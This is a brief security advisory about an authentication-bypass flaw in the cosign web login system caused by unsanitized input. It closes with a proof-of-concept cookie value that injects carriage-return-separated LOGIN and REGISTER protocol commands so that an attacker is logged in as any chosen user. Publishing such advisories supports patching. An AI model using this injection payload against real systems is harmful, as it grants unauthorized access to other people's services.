source: http://www.securityfocus.com/bid/23422/info

The 'cosign' application is prone to an authentication-bypass vulnerability because it fails to adequately sanitize user-supplied input.

An attacker can exploit this issue to gain unauthorized access to services hosted on an affected computer.

Versions prior to 1.9.4b and 2.0.2a are vulnerable. 

cosign=X\rLOGIN cosign=X 1.2.3.4 username\rREGISTER cosign=X 1.2.3.4 cosign-servicename=Y